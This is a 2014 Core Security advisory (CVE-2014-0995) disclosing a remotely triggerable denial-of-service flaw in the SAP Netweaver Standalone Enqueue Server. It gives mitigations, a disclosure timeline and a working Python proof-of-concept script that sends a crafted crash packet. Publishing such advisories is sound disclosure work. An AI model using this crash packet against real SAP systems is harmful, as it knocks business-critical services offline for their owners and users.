276 lines
No EOL
8.8 KiB
Text
276 lines
No EOL
8.8 KiB
Text
Core Security - Corelabs Advisory
|
|
http://corelabs.coresecurity.com/
|
|
|
|
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
|
|
|
|
1. **Advisory Information**
|
|
|
|
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
|
|
Vulnerability
|
|
Advisory ID: CORE-2014-0007
|
|
Advisory URL:
|
|
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
|
|
Date published: 2014-10-15
|
|
Date of last update: 2014-10-15
|
|
Vendors contacted: SAP
|
|
Release mode: Coordinated release
|
|
|
|
2. **Vulnerability Information***
|
|
*
|
|
Class: Uncontrolled Recursion [CWE-674]
|
|
Impact: Denial of service
|
|
Remotely Exploitable: Yes
|
|
Locally Exploitable: No
|
|
CVE Name: CVE-2014-0995
|
|
|
|
3. **Vulnerability Description**
|
|
|
|
SAP Netweaver [1] is a technology platform for building and
|
|
integrating SAP business
|
|
applications. A vulnerability has been found in SAP Netweaver
|
|
that could allow an
|
|
unauthenticated, remote attacker to create denial of service
|
|
conditions. The vulnerability
|
|
is triggered by sending a specially crafted SAP Enqueue Server
|
|
packet to remote TCP port 32NN
|
|
(NN being the SAP system number) of a host running the
|
|
"Standalone Enqueue Server" service, part
|
|
of SAP Netweaver Application Server ABAP/Java. The "Standalone
|
|
Enqueue Server" is a critical
|
|
component of a SAP Netweaver installation in terms of
|
|
availability, rendering the whole SAP
|
|
system unresponsive.
|
|
|
|
4. **Vulnerable Packages**
|
|
|
|
. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
|
|
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
|
|
|
|
Other versions are probably affected too, but they were not checked.
|
|
|
|
5. **Vendor Information, Solutions and Workarounds**
|
|
|
|
Martin Gallo proposed the following actions to mitigate the
|
|
impact of the vulnerabilities:
|
|
|
|
Restrict access to the Standalone Enqueue service by configuring
|
|
Access Control Lists [4] and to
|
|
the Standalone Enqueue Service TCP port 32XX (XX is the instance
|
|
number).
|
|
|
|
SAP published a security note [3] with the fix.
|
|
|
|
6. **Credits**
|
|
|
|
This vulnerability was discovered and researched by Martin Gallo
|
|
from Core Security Consulting
|
|
Services. The publication of this advisory was coordinated by
|
|
Joaquín Rodríguez Varela from Core
|
|
Advisories Team.
|
|
|
|
7. **Technical Description / Proof of Concept Code**
|
|
|
|
When the trace level of the service is configured to stop logging
|
|
when a pattern is found [2], the
|
|
service does not properly control the amount of recursion
|
|
resulting in a stack overflow exception.
|
|
The vulnerability can be triggered remotely by setting the trace
|
|
level with a wildcard Trace Pattern.
|
|
This vulnerability could allow a remote, unauthenticated attacker
|
|
to conduct a denial of service
|
|
attack against the vulnerable systems, rendering the Enqueue
|
|
Server unavailable.
|
|
|
|
The following python code can be used to trigger the vulnerability:
|
|
|
|
7.1. **Proof of Concept**
|
|
|
|
/-----
|
|
import socket, struct
|
|
from optparse import OptionParser
|
|
|
|
# Parse the target options
|
|
parser = OptionParser()
|
|
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
|
|
default="localhost")
|
|
parser.add_option("-p", "--port", dest="port", type="int", help="Port
|
|
number", default=3200)
|
|
(options, args) = parser.parse_args()
|
|
|
|
def send_packet(sock, packet):
|
|
packet = struct.pack("!I", len(packet)) + packet
|
|
sock.send(packet)
|
|
|
|
# Connect
|
|
print "[*] Connecting to", options.hostname, "port", options.port
|
|
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connection.connect((options.hostname, options.port))
|
|
|
|
print "[*] Sending crash packet"
|
|
|
|
crash = '\xab\xcd\xe1\x23' # Magic bytes
|
|
crash+= '\x00\x00\x00\x00' # Id
|
|
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length
|
|
crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type
|
|
crash+= 'ENC\x00' # Admin Eye-catcher
|
|
crash+= '\x01\x00\x00\x00' # Version
|
|
crash+= '#EAA' # Admin Eye-catcher
|
|
crash+= '\x01\x00\x00\x00\x00' # Len
|
|
crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC
|
|
crash+= '#EAE' # Admin Eye-catcher
|
|
crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Tread
|
|
crash+= '\x00\x00\x00\x00'
|
|
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level
|
|
crash+= '\x01' # Logging
|
|
crash+= '\x01\x40\x00\x00' # Max file size
|
|
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns
|
|
crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher
|
|
crash+= '\x01*\x00' # Trace Pattern
|
|
crash+= '#EAD' # Trace Eye-catcher
|
|
|
|
send_packet(connection, crash)
|
|
print "[*] Crash sent !"
|
|
-----/
|
|
|
|
8. **Report Timeline**
|
|
|
|
. 2014-06-02:
|
|
|
|
Initial notification sent to SAP, including technical
|
|
description to reproduce the
|
|
vulnerability. Publication date set to Jun 30, 2014.
|
|
|
|
. 2014-06-03:
|
|
|
|
Vendor notifies that the tracking number 1153917-2014 was
|
|
created for this issue.
|
|
|
|
. 2014-06-26:
|
|
|
|
Core Security requests SAP to inform the status of the advisory.
|
|
|
|
. 2014-06-30:
|
|
|
|
The vendor informs they were not able to reproduce the issue and
|
|
they request additional
|
|
details and a proof of concept.
|
|
|
|
. 2014-06-30:
|
|
|
|
Core Security sends SAP a full description of the vulnerability
|
|
including a python script
|
|
to trigger it.
|
|
|
|
. 2014-07-11:
|
|
|
|
Core Security asks if the vendor was able to trigger the
|
|
vulnerability. Additinally we
|
|
requested to set a publication date for the advisory based on
|
|
the release of a fix.
|
|
|
|
. 2014-07-14:
|
|
|
|
The vendor informs they were able to reproduce the issue but
|
|
they will not be able to provide
|
|
a timeline for the fix at the time. They inform they will work
|
|
with high priority on it and
|
|
will inform us of the planned fix release date.
|
|
|
|
. 2014-08-12:
|
|
|
|
Core Security asks if the vendor was able to develop a fix and
|
|
if they have a possible timeline
|
|
for its availability.
|
|
|
|
. 2014-08-13:
|
|
|
|
The vendor informs that the fix is undergoing quality checks.
|
|
They also inform that they can't
|
|
provide an exact date of publication yet. They also request a 3
|
|
months grace period once the
|
|
patch is available.
|
|
|
|
. 2014-08-13:
|
|
|
|
Core Security informs SAP that after we get notice that the fix
|
|
is available to the public we will
|
|
publish the advisory accordingly and will not wait for the 3
|
|
months of grace as requested because
|
|
that's not our proceeding policy.
|
|
|
|
. 2014-08-18:
|
|
|
|
The vendor informs that the fix is going to be released with the
|
|
October patch day, on Tuesday the
|
|
14th, of 2014.
|
|
|
|
. 2014-10-14:
|
|
|
|
The vendor publishes the fix under the security note 2042845.
|
|
|
|
. 2014-10-15:
|
|
|
|
Core Security releases the advisory.
|
|
|
|
9. **References**
|
|
|
|
[1] http://www.sap.com/platform/netweaver/index.epx.
|
|
[2]
|
|
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
|
|
[3] SAP security note 2042845
|
|
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.
|
|
|
|
10. **About CoreLabs**
|
|
|
|
CoreLabs, the research center of Core Security, is charged with
|
|
anticipating
|
|
the future needs and requirements for information security
|
|
technologies.
|
|
We conduct our research in several important areas of computer
|
|
security
|
|
including system vulnerabilities, cyber attack planning and
|
|
simulation,
|
|
source code auditing, and cryptography. Our results include problem
|
|
formalization, identification of vulnerabilities, novel
|
|
solutions and
|
|
prototypes for new technologies. CoreLabs regularly publishes
|
|
security
|
|
advisories, technical papers, project information and shared
|
|
software
|
|
tools for public use at: http://corelabs.coresecurity.com.
|
|
|
|
11. **About Core Security**
|
|
|
|
Core Security enables organizations to get ahead of threats with
|
|
security
|
|
test and measurement solutions that continuously identify and
|
|
demonstrate
|
|
real-world exposures to their most critical assets. Our
|
|
customers can
|
|
gain real visibility into their security standing, real
|
|
validation of
|
|
their security controls, and real metrics to more effectively
|
|
secure their
|
|
organizations.
|
|
|
|
Core Security's software solutions build on over a decade of trusted
|
|
research and leading-edge threat expertise from the company's
|
|
Security
|
|
Consulting Services, CoreLabs and Engineering groups. Core Security
|
|
can be reached at +1 (617) 399-6980 or on the Web at:
|
|
http://www.coresecurity.com.
|
|
|
|
12. **Disclaimer**
|
|
|
|
The contents of this advisory are copyright (c) 2014 Core
|
|
Security and (c) 2014 CoreLabs, and
|
|
are licensed under a Creative Commons Attribution Non-Commercial
|
|
Share-Alike 3.0 (United States) License:
|
|
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
|
|
|
13. **PGP/GPG Keys**
|
|
|
|
This advisory has been signed with the GPG key of Core Security
|
|
advisories team, which is available for download at
|
|
|
|
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. |